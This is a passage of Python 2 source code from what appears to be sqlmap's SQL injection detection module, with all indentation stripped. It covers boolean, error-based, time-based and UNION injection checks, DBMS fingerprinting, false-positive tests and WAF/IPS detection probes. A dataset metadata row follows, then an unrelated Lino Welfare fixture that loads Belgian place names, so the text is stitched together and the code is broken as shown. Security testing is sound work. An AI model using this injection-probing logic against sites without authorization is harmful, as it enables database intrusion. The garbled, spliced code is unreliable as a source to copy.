falseResult = Request.queryPage(genCmpPayload(), place, raise404=False)
if not falseResult:
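# When negative logic is in use, additionally send a syntactically broken
# payload; if that one also "succeeds", the behaviour is unrelated to SQL
# evaluation and the finding is discarded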
if kb.negativeLogic:
boundPayload = agent.prefixQuery(kb.data.randomStr, prefix, where, clause)
boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
errorPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
errorResult = Request.queryPage(errorPayload, place, raise404=False)
if errorResult:
continue
infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
logger.info(infoMsg)
injectable = True
if not injectable and not any((conf.string, conf.notString, conf.regexp)) and kb.pageStable:
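# Compare the text content of the True and False responses; a snippet found
# only in the True response (and in the original page) can be suggested as
# an automatic --string match value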
trueSet = set(extractTextTagContent(truePage))
falseSet = set(extractTextTagContent(falsePage))
candidates = filter(None, (_.strip() if _.strip() in (kb.pageTemplate or "") and _.strip() not in falsePage and _.strip() not in threadData.lastComparisonHeaders else None for _ in (trueSet - falseSet)))
if candidates:
conf.string = candidates[0]
infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'"))
logger.info(infoMsg)
injectable = True
# In case of error-based SQL injection
elif method == PAYLOAD.METHOD.GREP:
# Perform the test's request and grep the response
# body for the test's <grep> regular expression
try:
page, headers = Request.queryPage(reqPayload, place, content=True, raise404=False)
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \
or extractRegexResult(check, listToStrValue( \
[headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()] \
if headers else None), re.DOTALL | re.IGNORECASE) \
or extractRegexResult(check, threadData.lastRedirectMsg[1] \
if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \
threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
if output:
result = output == "1"
if result:
infoMsg = "%s parameter '%s' is '%s' injectable " % (paramType, parameter, title)
logger.info(infoMsg)
injectable = True
except SqlmapConnectionException, msg:
debugMsg = "problem occurred most likely because the "
debugMsg += "server hasn't recovered as expected from the "
debugMsg += "error-based payload used ('%s')" % msg
logger.debug(debugMsg)
# In case of time-based blind or stacked queries
# SQL injections
elif method == PAYLOAD.METHOD.TIME:
# Perform the test's request
trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
if trueResult:
# Confirm test's results
trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
if trueResult:
infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
logger.info(infoMsg)
injectable = True
# In case of UNION query SQL injection
elif method == PAYLOAD.METHOD.UNION:
# Test for UNION injection and set the sample
# payload as well as the vector.
# NOTE: vector is set to a tuple with 6 elements,
# used afterwards by Agent.forgeUnionQuery()
# method to forge the UNION query payload
configUnion(test.request.char, test.request.columns)
if not Backend.getIdentifiedDbms():
if kb.heuristicDbms is None:
warnMsg = "using unescaped version of the test "
warnMsg += "because of zero knowledge of the "
warnMsg += "back-end DBMS. You can try to "
warnMsg += "explicitly set it using option '--dbms'"
singleTimeWarnMessage(warnMsg)
else:
Backend.forceDbms(kb.heuristicDbms)
if unionExtended:
infoMsg = "automatically extending ranges for UNION "
infoMsg += "query injection technique tests as "
infoMsg += "there is at least one other (potential) "
infoMsg += "technique found"
singleTimeLogMessage(infoMsg)
elif not injection.data:
_ = test.request.columns.split('-')[-1]
if _.isdigit() and int(_) > 10:
if kb.futileUnion is None:
msg = "it is not recommended to perform "
msg += "extended UNION tests if there is not "
msg += "at least one other (potential) "
msg += "technique found. Do you want to skip? [Y/n] "
kb.futileUnion = readInput(msg, default="Y").strip().upper() == 'N'
if kb.futileUnion is False:
continue
# Test for UNION query SQL injection
reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
if isinstance(reqPayload, basestring):
infoMsg = "%s parameter '%s' is '%s' injectable" % (paramType, parameter, title)
logger.info(infoMsg)
injectable = True
# Overwrite 'where' because it can be set
# by unionTest() directly
where = vector[6]
kb.previousMethod = method
if conf.dummy or conf.offline:
injectable = False
# If the injection test was successful feed the injection
# object with the test's details
if injectable is True:
# Feed with the boundaries details only the first time a
# test has been successful
if injection.place is None or injection.parameter is None:
if place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
injection.parameter = place
else:
injection.parameter = parameter
injection.place = place
injection.ptype = ptype
injection.prefix = prefix
injection.suffix = suffix
injection.clause = clause
# Feed with test details every time a test is successful
if hasattr(test, "details"):
for dKey, dValue in test.details.items():
if dKey == "dbms":
injection.dbms = dValue
if not isinstance(dValue, list):
Backend.setDbms(dValue)
else:
Backend.forceDbms(dValue[0], True)
elif dKey == "dbms_version" and injection.dbms_version is None and not conf.testFilter:
injection.dbms_version = Backend.setVersion(dValue)
elif dKey == "os" and injection.os is None:
injection.os = Backend.setOs(dValue)
if vector is None and "vector" in test and test.vector is not None:
vector = test.vector
injection.data[stype] = AttribDict()
injection.data[stype].title = title
injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload)
injection.data[stype].where = where
injection.data[stype].vector = vector
injection.data[stype].comment = comment
injection.data[stype].templatePayload = templatePayload
injection.data[stype].matchRatio = kb.matchRatio
injection.conf.textOnly = conf.textOnly
injection.conf.titles = conf.titles
injection.conf.string = conf.string
injection.conf.notString = conf.notString
injection.conf.regexp = conf.regexp
injection.conf.optimize = conf.optimize
if not kb.alerted:
if conf.beep:
beep()
if conf.alert:
infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert
logger.info(infoMsg)
process = execute(conf.alert, shell=True)
process.wait()
kb.alerted = True
# There is no need to perform this test for other
# <where> tags
break
if injectable is True:
kb.vulnHosts.add(conf.hostname)
break
# Reset forced back-end DBMS value
Backend.flushForcedDbms()
except KeyboardInterrupt:
warnMsg = "user aborted during detection phase"
logger.warn(warnMsg)
msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
choice = readInput(msg, default="S", checkBatch=False)
if choice[0] in ("s", "S"):
pass
elif choice[0] in ("c", "C"):
choice = None
while not ((choice or "").isdigit() and 0 <= int(choice) <= 6):
if choice:
logger.warn("invalid value")
msg = "enter new verbosity level: [0-6] "
choice = readInput(msg, default=str(conf.verbose), checkBatch=False).strip()
conf.verbose = int(choice)
setVerbosity()
tests.insert(0, test)
elif choice[0] in ("n", "N"):
return None
elif choice[0] in ("e", "E"):
kb.endDetection = True
elif choice[0] in ("q", "Q"):
raise SqlmapUserQuitException
finally:
# Reset forced back-end DBMS value
Backend.flushForcedDbms()
Backend.flushForcedDbms(True)
# Return the injection object
if injection.place is not None and injection.parameter is not None:
if not conf.dropSetCookie and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data and injection.data[PAYLOAD.TECHNIQUE.BOOLEAN].vector.startswith('OR'):
warnMsg = "in OR boolean-based injections, please consider usage "
warnMsg += "of switch '--drop-set-cookie' if you experience any "
warnMsg += "problems during data retrieval"
logger.warn(warnMsg)
if not checkFalsePositives(injection):
kb.vulnHosts.remove(conf.hostname)
injection.notes.add(NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE)
else:
injection = None
if injection:
checkSuhosinPatch(injection)
checkFilteredChars(injection)
return injection
def heuristicCheckDbms(injection):
"""
This function is called when boolean-based blind is identified with a
generic payload and the DBMS has not yet been fingerprinted; it attempts
to identify the DBMS with a simple DBMS-specific boolean-based test
"""
retVal = False
pushValue(kb.injection)
kb.injection = injection
for dbms in getPublicTypeMembers(DBMS, True):
randStr1, randStr2 = randomStr(), randomStr()
Backend.forceDbms(dbms)
if conf.noEscape and dbms not in FROM_DUMMY_TABLE:
continue
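# Probe with a DBMS-specific dummy-table SELECT: the expression must be
# True for identical strings and False for different ones before the DBMS
# is considered a match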
if checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr1)):
if not checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr2)):
retVal = dbms
break
Backend.flushForcedDbms()
kb.injection = popValue()
if retVal:
infoMsg = "heuristic (extended) test shows that the back-end DBMS " # Not as important as "parsing" counter-part (because of false-positives)
infoMsg += "could be '%s' " % retVal
logger.info(infoMsg)
return retVal
def checkFalsePositives(injection):
"""
Checks for false positives (only in single special cases)
"""
retVal = True
if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or\
(len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
pushValue(kb.injection)
infoMsg = "checking if the injection point on %s " % injection.place
infoMsg += "parameter '%s' is a false positive" % injection.parameter
logger.info(infoMsg)
def _():
return int(randomInt(2)) + 1
kb.injection = injection
for i in xrange(conf.level):
while True:
randInt1, randInt2, randInt3 = (_() for j in xrange(3))
randInt1 = min(randInt1, randInt2, randInt3)
randInt3 = max(randInt1, randInt2, randInt3)
if randInt3 > randInt2 > randInt1:
break
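# Use three distinct random integers to assert trivially true and trivially
# false comparisons through the injection; any unexpected outcome marks the
# finding as a false positive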
if not checkBooleanExpression("%d=%d" % (randInt1, randInt1)):
retVal = False
break
# Just in case the DBMS hasn't properly recovered from the previous delayed request
if PAYLOAD.TECHNIQUE.BOOLEAN not in injection.data:
checkBooleanExpression("%d=%d" % (randInt1, randInt2))
if checkBooleanExpression("%d=%d" % (randInt1, randInt3)): # this must not be evaluated to True
retVal = False
break
elif checkBooleanExpression("%d=%d" % (randInt3, randInt2)): # this must not be evaluated to True
retVal = False
break
elif not checkBooleanExpression("%d=%d" % (randInt2, randInt2)): # this must be evaluated to True
retVal = False
break
elif checkBooleanExpression("%d %d" % (randInt3, randInt2)): # this must not be evaluated to True (invalid statement)
retVal = False
break
if not retVal:
warnMsg = "false positive or unexploitable injection point detected"
logger.warn(warnMsg)
kb.injection = popValue()
return retVal
def checkSuhosinPatch(injection):
"""
Checks for existence of Suhosin-patch (and alike) protection mechanism(s)
"""
if injection.place == PLACE.GET:
debugMsg = "checking for parameter length "
debugMsg += "constrainting mechanisms"
logger.debug(debugMsg)
pushValue(kb.injection)
kb.injection = injection
randInt = randomInt()
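# Pad a trivially true expression with spaces up to SUHOSIN_MAX_VALUE_LENGTH;
# if it no longer evaluates to True, a parameter length limiting mechanism
# (e.g. Suhosin patch) is probably truncating the value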
if not checkBooleanExpression("%d=%s%d" % (randInt, ' ' * SUHOSIN_MAX_VALUE_LENGTH, randInt)):
warnMsg = "parameter length constrainting "
warnMsg += "mechanism detected (e.g. Suhosin patch). "
warnMsg += "Potential problems in enumeration phase can be expected"
logger.warn(warnMsg)
kb.injection = popValue()
def checkFilteredChars(injection):
debugMsg = "checking for filtered characters"
logger.debug(debugMsg)
pushValue(kb.injection)
kb.injection = injection
randInt = randomInt()
# all other techniques are already using parentheses in tests
if len(injection.data) == 1 and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:
if not checkBooleanExpression("(%d)=%d" % (randInt, randInt)):
warnMsg = "it appears that some non-alphanumeric characters (i.e. ()) are "
warnMsg += "filtered by the back-end server. There is a strong "
warnMsg += "possibility that sqlmap won't be able to properly "
warnMsg += "exploit this vulnerability"
logger.warn(warnMsg)
# inference techniques depend on character '>'
if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)):
if not checkBooleanExpression("%d>%d" % (randInt+1, randInt)):
warnMsg = "it appears that the character '>' is "
warnMsg += "filtered by the back-end server. You are strongly "
warnMsg += "advised to rerun with the '--tamper=between'"
logger.warn(warnMsg)
kb.injection = popValue()
def heuristicCheckSqlInjection(place, parameter):
if kb.nullConnection:
debugMsg = "heuristic check skipped because NULL connection used"
logger.debug(debugMsg)
return None
origValue = conf.paramDict[place][parameter]
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
prefix = ""
suffix = ""
if conf.prefix or conf.suffix:
if conf.prefix:
prefix = conf.prefix
if conf.suffix:
suffix = conf.suffix
randStr = ""
while '\'' not in randStr:
randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET)
kb.heuristicMode = True
payload = "%s%s%s" % (prefix, randStr, suffix)
payload = agent.payload(place, parameter, newValue=payload)
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
kb.heuristicMode = False
parseFilePaths(page)
result = wasLastResponseDBMSError()
infoMsg = "heuristic (basic) test shows that %s parameter " % paramType
infoMsg += "'%s' might " % parameter
def _(page):
return any(_ in (page or "") for _ in FORMAT_EXCEPTION_STRINGS)
casting = _(page) and not _(kb.originalPage)
if not casting and not result and kb.dynamicParameter and origValue.isdigit():
randInt = int(randomInt())
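# For numeric parameters send "<value+N>-<N>": if the back-end evaluates the
# arithmetic, the response matches the original one; otherwise a decimal/string
# suffix is tried to detect server-side type casting (e.g. intval())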
payload = "%s%s%s" % (prefix, "%d-%d" % (int(origValue) + randInt, randInt), suffix)
payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)
result = Request.queryPage(payload, place, raise404=False)
if not result:
randStr = randomStr()
payload = "%s%s%s" % (prefix, "%s.%d%s" % (origValue, random.randint(1, 9), randStr), suffix)
payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)
casting = Request.queryPage(payload, place, raise404=False)
kb.heuristicTest = HEURISTIC_TEST.CASTED if casting else HEURISTIC_TEST.NEGATIVE if not result else HEURISTIC_TEST.POSITIVE
if casting:
errMsg = "possible %s casting " % ("integer" if origValue.isdigit() else "type")
errMsg += "detected (e.g. \"$%s=intval($_REQUEST['%s'])\") " % (parameter, parameter)
errMsg += "at the back-end web application"
logger.error(errMsg)
if kb.ignoreCasted is None:
message = "do you want to skip those kind of cases (and save scanning time)? %s " % ("[Y/n]" if conf.multipleTargets else "[y/N]")
kb.ignoreCasted = readInput(message, default='Y' if conf.multipleTargets else 'N').upper() != 'N'
elif result:
infoMsg += "be injectable"
if Backend.getErrorParsedDBMSes():
infoMsg += " (possible DBMS: '%s')" % Format.getErrorParsedDBMSes()
logger.info(infoMsg)
else:
infoMsg += "not be injectable"
logger.warn(infoMsg)
kb.heuristicMode = True
randStr1, randStr2 = randomStr(NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH), randomStr(NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH)
value = "%s%s%s" % (randStr1, DUMMY_NON_SQLI_CHECK_APPENDIX, randStr2)
payload = "%s%s%s" % (prefix, "'%s" % value, suffix)
payload = agent.payload(place, parameter, newValue=payload)
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
if value.lower() in (page or "").lower():
infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType
infoMsg += "'%s' might be vulnerable to cross-site scripting attacks" % parameter
logger.info(infoMsg)
for match in re.finditer("(?i)[^\n]*(no such file|failed (to )?open)[^\n]*", page or ""):
if randStr1.lower() in match.group(0).lower():
infoMsg = "heuristic (FI) test shows that %s parameter " % paramType
infoMsg += "'%s' might be vulnerable to file inclusion attacks" % parameter
logger.info(infoMsg)
break
kb.heuristicMode = False
return kb.heuristicTest
def checkDynParam(place, parameter, value):
"""
This function checks if the URL parameter is dynamic. If it is
dynamic, the content of the page differs, otherwise the
dynamicity might depend on another parameter.
"""
if kb.redirectChoice:
return None
kb.matchRatio = None
dynResult = None
randInt = randomInt()
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
infoMsg = "testing if %s parameter '%s' is dynamic" % (paramType, parameter)
logger.info(infoMsg)
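# Replace the original value with a random integer; if the page content
# changes (confirmed with a second random value), the parameter is
# considered dynamic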
try:
payload = agent.payload(place, parameter, value, getUnicode(randInt))
dynResult = Request.queryPage(payload, place, raise404=False)
if not dynResult:
infoMsg = "confirming that %s parameter '%s' is dynamic" % (paramType, parameter)
logger.info(infoMsg)
randInt = randomInt()
payload = agent.payload(place, parameter, value, getUnicode(randInt))
dynResult = Request.queryPage(payload, place, raise404=False)
except SqlmapConnectionException:
pass
result = None if dynResult is None else not dynResult
kb.dynamicParameter = result
return result
def checkDynamicContent(firstPage, secondPage):
"""
This function checks for the dynamic content in the provided pages
"""
if kb.nullConnection:
debugMsg = "dynamic content checking skipped "
debugMsg += "because NULL connection used"
logger.debug(debugMsg)
return
if any(page is None for page in (firstPage, secondPage)):
warnMsg = "can't check dynamic content "
warnMsg += "because of lack of page content"
logger.critical(warnMsg)
return
seqMatcher = getCurrentThreadData().seqMatcher
seqMatcher.set_seq1(firstPage)
seqMatcher.set_seq2(secondPage)
# In case of an intolerable difference turn on dynamicity removal engine
if seqMatcher.quick_ratio() <= UPPER_RATIO_BOUND:
findDynamicContent(firstPage, secondPage)
count = 0
while not Request.queryPage():
count += 1
if count > conf.retries:
warnMsg = "target URL is too dynamic. "
warnMsg += "Switching to '--text-only' "
logger.warn(warnMsg)
conf.textOnly = True
return
warnMsg = "target URL is heavily dynamic"
warnMsg += ". sqlmap is going to retry the request"
logger.critical(warnMsg)
secondPage, _ = Request.queryPage(content=True)
findDynamicContent(firstPage, secondPage)
def checkStability():
"""
This function checks if the URL content is stable by requesting the
same page twice with a small delay between the requests.
In case the content of the page differs when requesting
the same page, the dynamicity might depend on other parameters,
like for instance string matching (--string).
"""
infoMsg = "testing if the target URL is stable"
logger.info(infoMsg)
firstPage = kb.originalPage # set inside checkConnection()
delay = 1 - (time.time() - (kb.originalPageTime or 0))
delay = max(0, min(1, delay))
time.sleep(delay)
secondPage, _ = Request.queryPage(content=True, noteResponseTime=False, raise404=False)
if kb.redirectChoice:
return None
kb.pageStable = (firstPage == secondPage)
if kb.pageStable:
if firstPage:
infoMsg = "target URL is stable"
logger.info(infoMsg)
else:
errMsg = "there was an error checking the stability of page "
errMsg += "because of lack of content. Please check the "
errMsg += "page request results (and probable errors) by "
errMsg += "using higher verbosity levels"
logger.error(errMsg)
else:
warnMsg = "target URL is not stable. sqlmap will base the page "
warnMsg += "comparison on a sequence matcher. If no dynamic nor "
warnMsg += "injectable parameters are detected, or in case of "
warnMsg += "junk results, refer to user's manual paragraph "
warnMsg += "'Page comparison' and provide a string or regular "
warnMsg += "expression to match on"
logger.warn(warnMsg)
message = "how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] "
test = readInput(message, default="C")
if test and test[0] in ("q", "Q"):
raise SqlmapUserQuitException
elif test and test[0] in ("s", "S"):
showStaticWords(firstPage, secondPage)
message = "please enter value for parameter 'string': "
test = readInput(message)
if test:
conf.string = test
if kb.nullConnection:
debugMsg = "turning off NULL connection "
debugMsg += "support because of string checking"
logger.debug(debugMsg)
kb.nullConnection = None
else:
errMsg = "Empty value supplied"
raise SqlmapNoneDataException(errMsg)
elif test and test[0] in ("r", "R"):
message = "please enter value for parameter 'regex': "
test = readInput(message)
if test:
conf.regex = test
if kb.nullConnection:
debugMsg = "turning off NULL connection "
debugMsg += "support because of regex checking"
logger.debug(debugMsg)
kb.nullConnection = None
else:
errMsg = "Empty value supplied"
raise SqlmapNoneDataException(errMsg)
else:
checkDynamicContent(firstPage, secondPage)
return kb.pageStable
def checkString():
if not conf.string:
return True
infoMsg = "testing if the provided string is within the "
infoMsg += "target URL page content"
logger.info(infoMsg)
page, headers = Request.queryPage(content=True)
rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)
if conf.string not in rawResponse:
warnMsg = "you provided '%s' as the string to " % conf.string
warnMsg += "match, but such a string is not within the target "
warnMsg += "URL raw response, sqlmap will carry on anyway"
logger.warn(warnMsg)
return True
def checkRegexp():
if not conf.regexp:
return True
infoMsg = "testing if the provided regular expression matches within "
infoMsg += "the target URL page content"
logger.info(infoMsg)
page, headers = Request.queryPage(content=True)
rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)
if not re.search(conf.regexp, rawResponse, re.I | re.M):
warnMsg = "you provided '%s' as the regular expression to " % conf.regexp
warnMsg += "match, but such a regular expression does not have any "
warnMsg += "match within the target URL raw response, sqlmap "
warnMsg += "will carry on anyway"
logger.warn(warnMsg)
return True
def checkWaf():
"""
Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
"""
if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline, conf.skipWaf)):
return None
_ = hashDBRetrieve(HASHDB_KEYS.CHECK_WAF_RESULT, True)
if _ is not None:
if _:
warnMsg = "previous heuristics detected that the target "
warnMsg += "is protected by some kind of WAF/IPS/IDS"
logger.critical(warnMsg)
return _
infoMsg = "checking if the target is protected by "
infoMsg += "some kind of WAF/IPS/IDS"
logger.info(infoMsg)
retVal = False
payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD)
value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload))
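# Append a throw-away GET parameter carrying a known attack payload; a
# response differing markedly from the original (or a dropped connection)
# suggests a WAF/IPS/IDS in front of the target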
pushValue(conf.timeout)
conf.timeout = IDS_WAF_CHECK_TIMEOUT
try:
retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO
except SqlmapConnectionException:
retVal = True
finally:
kb.matchRatio = None
conf.timeout = popValue()
if retVal:
warnMsg = "heuristics detected that the target "
warnMsg += "is protected by some kind of WAF/IPS/IDS"
logger.critical(warnMsg)
if not conf.identifyWaf:
message = "do you want sqlmap to try to detect backend "
message += "WAF/IPS/IDS? [y/N] "
output = readInput(message, default="N")
if output and output[0] in ("Y", "y"):
conf.identifyWaf = True
if conf.timeout == defaults.timeout:
logger.warning("dropping timeout to %d seconds (i.e. '--timeout=%d')" % (IDS_WAF_CHECK_TIMEOUT, IDS_WAF_CHECK_TIMEOUT))
conf.timeout = IDS_WAF_CHECK_TIMEOUT
hashDBWrite(HASHDB_KEYS.CHECK_WAF_RESULT, retVal, True)
return retVal
def identifyWaf():
if not conf.identifyWaf:
return None
kb.testMode = True
infoMsg = "using WAF scripts to detect "
infoMsg += "backend WAF/IPS/IDS protection"
logger.info(infoMsg)
@cachedmethod
def _(*args, **kwargs):
page, headers, code = None, None, None
try:
pushValue(kb.redirectChoice)
kb.redirectChoice = REDIRECTION.NO
if kwargs.get("get"):
kwargs["get"] = urlencode(kwargs["get"])
kwargs["raise404"] = False
kwargs["silent"] = True
page, headers, code = Request.getPage(*args, **kwargs)
except Exception:
pass
finally:
kb.redirectChoice = popValue()
return page or "", headers or {}, code
retVal = False
for function, product in kb.wafFunctions:
try:
logger.debug("checking for WAF/IDS/IPS product '%s'" % product)
found = function(_)
except Exception, ex:
errMsg = "exception occurred while running "
errMsg += "WAF script for '%s' ('%s')" % (product, getSafeExString(ex))
logger.critical(errMsg)
found = False
if found:
retVal = product
break
if retVal:
errMsg = "WAF/IDS/IPS identified '%s'. Please " % retVal
errMsg += "consider usage of tamper scripts (option '--tamper')"
logger.critical(errMsg)
message = "are you sure that you want to "
message += "continue with further target testing? [y/N] "
output = readInput(message, default="N")
if output and output[0] not in ("Y", "y"):
raise SqlmapUserQuitException
else:
warnMsg = "no WAF/IDS/IPS product has been identified (this doesn't mean that there is none)"
logger.warn(warnMsg)
kb.testType = None
kb.testMode = False
return retVal
def checkNullConnection():
"""
Reference: http://www.wisec.it/sectou.php?id=472f952d79293
"""
if conf.data:
return False
infoMsg = "testing NULL connection to the target URL"
logger.info(infoMsg)
try:
pushValue(kb.pageCompress)
kb.pageCompress = False
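# Try, in order: a HEAD request, a ranged GET request and a body-skipping
# GET; the first variant still exposing Content-Length/Content-Range is kept
# as the NULL connection method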
page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD)
if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
kb.nullConnection = NULLCONNECTION.HEAD
infoMsg = "NULL connection is supported with HEAD header"
logger.info(infoMsg)
else:
page, headers, _ = Request.getPage(auxHeaders={HTTP_HEADER.RANGE: "bytes=-1"})
if page and len(page) == 1 and HTTP_HEADER.CONTENT_RANGE in (headers or {}):
kb.nullConnection = NULLCONNECTION.RANGE
infoMsg = "NULL connection is supported with GET header "
infoMsg += "'%s'" % kb.nullConnection
logger.info(infoMsg)
else:
_, headers, _ = Request.getPage(skipRead = True)
if HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
kb.nullConnection = NULLCONNECTION.SKIP_READ
infoMsg = "NULL connection is supported with 'skip-read' method"
logger.info(infoMsg)
except SqlmapConnectionException, ex:
errMsg = getSafeExString(ex)
raise SqlmapConnectionException(errMsg)
finally:
kb.pageCompress = popValue()
return kb.nullConnection is not None
def checkConnection(suppressOutput=False):
if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):
try:
debugMsg = "resolving hostname '%s'" % conf.hostname
logger.debug(debugMsg)
socket.getaddrinfo(conf.hostname, None)
except socket.gaierror:
errMsg = "host '%s' does not exist" % conf.hostname
raise SqlmapConnectionException(errMsg)
except socket.error, ex:
errMsg = "problem occurred while "
errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex))
raise SqlmapConnectionException(errMsg)
if not suppressOutput and not conf.dummy and not conf.offline:
infoMsg = "testing connection to the target URL"
logger.info(infoMsg)
try:
kb.originalPageTime = time.time()
page, headers = Request.queryPage(content=True, noteResponseTime=False)
kb.originalPage = kb.pageTemplate = page
kb.errorIsNone = False
if not kb.originalPage and wasLastResponseHTTPError():
errMsg = "unable to retrieve page content"
raise SqlmapConnectionException(errMsg)
elif wasLastResponseDBMSError():
warnMsg = "there is a DBMS error found in the HTTP response body "
warnMsg += "which could interfere with the results of the tests"
logger.warn(warnMsg)
elif wasLastResponseHTTPError():
warnMsg = "the web server responded with an HTTP error code (%d) " % getLastRequestHTTPError()
warnMsg += "which could interfere with the results of the tests"
logger.warn(warnMsg)
else:
kb.errorIsNone = True
except SqlmapConnectionException, ex:
if conf.ipv6:
warnMsg = "check connection to a provided "
warnMsg += "IPv6 address with a tool like ping6 "
warnMsg += "(e.g. 'ping6 -I eth0 %s') " % conf.hostname
warnMsg += "prior to running sqlmap to avoid "
warnMsg += "any addressing issues"
singleTimeWarnMessage(warnMsg)
if any(code in kb.httpErrorCodes for code in (httplib.NOT_FOUND, )):
errMsg = getSafeExString(ex)
logger.critical(errMsg)
if conf.multipleTargets:
return False
msg = "it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] "
if readInput(msg, default="Y") not in ("n", "N"):
raise SqlmapSilentQuitException
else:
kb.ignoreNotFound = True
else:
raise
return True
def setVerbosity(): # Cross-linked function
raise NotImplementedError
| apache-2.0 | -3,696,851,722,364,890,600 | 42.704385 | 235 | 0.566264 | false |
lino-framework/welfare | lino_welfare/projects/gerd/tests/dumps/18.8.0/countries_place.py | 2 | 8075 | # -*- coding: UTF-8 -*-
logger.info("Loading 78 objects to table countries_place...")
# fields: id, parent, name, country, zip_code, type, show_type, inscode
loader.save(create_countries_place(1,None,['Eupen', '', ''],u'BE',u'4700',u'50',False,u'63023'))
loader.save(create_countries_place(2,1,['Nispert', '', ''],u'BE',u'',u'55',False,u''))
loader.save(create_countries_place(3,None,['Burg-Reuland', '', ''],u'BE',u'4790',u'50',False,u'63087'))
loader.save(create_countries_place(4,3,['Ouren', '', ''],u'BE',u'',u'55',False,u''))
loader.save(create_countries_place(5,None,['Kelmis', 'La Calamine', 'Kelmis'],u'BE',u'4720',u'50',False,u'63040'))
loader.save(create_countries_place(6,None,['Kettenis', '', ''],u'BE',u'4701',u'70',False,u'63023'))
loader.save(create_countries_place(7,None,['Raeren', '', ''],u'BE',u'4730',u'70',False,u'63061'))
loader.save(create_countries_place(8,None,['Angleur', '', ''],u'BE',u'4031',u'50',False,u'62063'))
loader.save(create_countries_place(9,None,['Ans', '', ''],u'BE',u'4430',u'50',False,u'62003'))
loader.save(create_countries_place(10,None,['Ottignies', '', ''],u'BE',u'1340',u'50',False,u'25121'))
loader.save(create_countries_place(11,None,['Thieusies', '', ''],u'BE',u'7061',u'50',False,u'55040'))
loader.save(create_countries_place(12,None,['Cuesmes', '', ''],u'BE',u'7033',u'50',False,u'53053'))
loader.save(create_countries_place(13,None,['La Reid', '', ''],u'BE',u'4910',u'50',False,u'63076'))
loader.save(create_countries_place(14,None,['Bl\xe9gny', '', ''],u'BE',u'4670',u'50',False,u'62119'))
loader.save(create_countries_place(15,None,['Trembleur', '', ''],u'BE',u'4670',u'50',False,u'62119'))
loader.save(create_countries_place(16,None,['Mortier', '', ''],u'BE',u'4670',u'50',False,u'62119'))
loader.save(create_countries_place(17,None,['Cerfontaine', '', ''],u'BE',u'5630',u'50',False,u'93010'))
loader.save(create_countries_place(18,None,['Burdinne', '', ''],u'BE',u'4210',u'50',False,u'61010'))
loader.save(create_countries_place(19,None,['Antwerpen', 'Anvers', 'Anvers'],u'BE',u'',u'21',False,u''))
loader.save(create_countries_place(20,None,['Luxemburg', 'Luxembourg', 'Luxembourg'],u'BE',u'',u'21',False,u''))
loader.save(create_countries_place(21,None,['Nam\xfcr', 'Namur', 'Namur'],u'BE',u'',u'21',False,u''))
loader.save(create_countries_place(22,None,['Limburg', 'Limbourg', 'Limbourg'],u'BE',u'',u'21',False,u''))
